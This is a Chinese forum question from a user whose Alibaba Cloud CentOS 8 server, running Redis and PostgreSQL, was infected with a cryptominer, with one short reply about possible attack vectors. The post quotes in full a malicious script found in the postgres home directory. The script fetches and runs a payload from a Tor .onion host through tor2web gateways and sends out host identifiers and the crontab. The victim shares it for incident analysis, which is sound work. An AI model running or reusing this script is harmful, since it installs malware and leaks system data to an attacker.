吴俊言 2020-09-02 15:18 采纳率: 0%
浏览 313
已结题

centos8 系统中了木马挖矿程序,请问如何溯源?

在阿里云上买了一台centos8的服务器, 部署了redis、pgsql012 数据库, 服务器通过nat网关做了一个snat 可以上网,但是没有做dnat, 也就没有对外提供端口访问策略。 但是安全中心突然报警显示这台服务器有挖矿的木马程序,经过简单的查杀, 已经简单的把异常文件给kill掉了,系统也恢复了正常, 检查发现在postgress 这个用户的家目录中有两个恶意脚本文件, 我想不理解的,虽然的主机有上网能力,但是数据库的端口并没有对外提供,而且远程登陆都是通堡垒机,也没有发现异常操作,那这个木马程序是如何攻进来的呢?如何溯源呢?
恶意脚本内容如下:
ncM85D4kux95mCiJpO2bEuK6pSDgAxyo8iDwzI2aeW4D9rutGHUWkn85gtzMkzxU
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad")

sockz() {
n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1)
}

fexe() {
for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
fexe
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it tor2web.io tor2web.su onion.com.de tor2web.to onion.sh
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/01)/status; then
u $t.$h
else
break
fi
done

这是其中一个恶意脚本的内容, 其他的大概也都是这些内容,麻烦大神也帮忙分析下这个脚本的内容。谢谢

  • 写回答

2条回答 默认 最新

  • threenewbee 2020-09-02 15:51
    关注

    也不能排除是客户端或者阿里云同一个局域网网段德别的计算机利用漏洞攻击造成的。

    评论

报告相同问题?

悬赏问题

  • ¥15 ubuntu虚拟机打包apk错误
  • ¥199 rust编程架构设计的方案 有偿
  • ¥15 回答4f系统的像差计算
  • ¥15 java如何提取出pdf里的文字?
  • ¥100 求三轴之间相互配合画圆以及直线的算法
  • ¥100 c语言,请帮蒟蒻写一个题的范例作参考
  • ¥15 名为“Product”的列已属于此 DataTable
  • ¥15 安卓adb backup备份应用数据失败
  • ¥15 eclipse运行项目时遇到的问题
  • ¥15 关于#c##的问题:最近需要用CAT工具Trados进行一些开发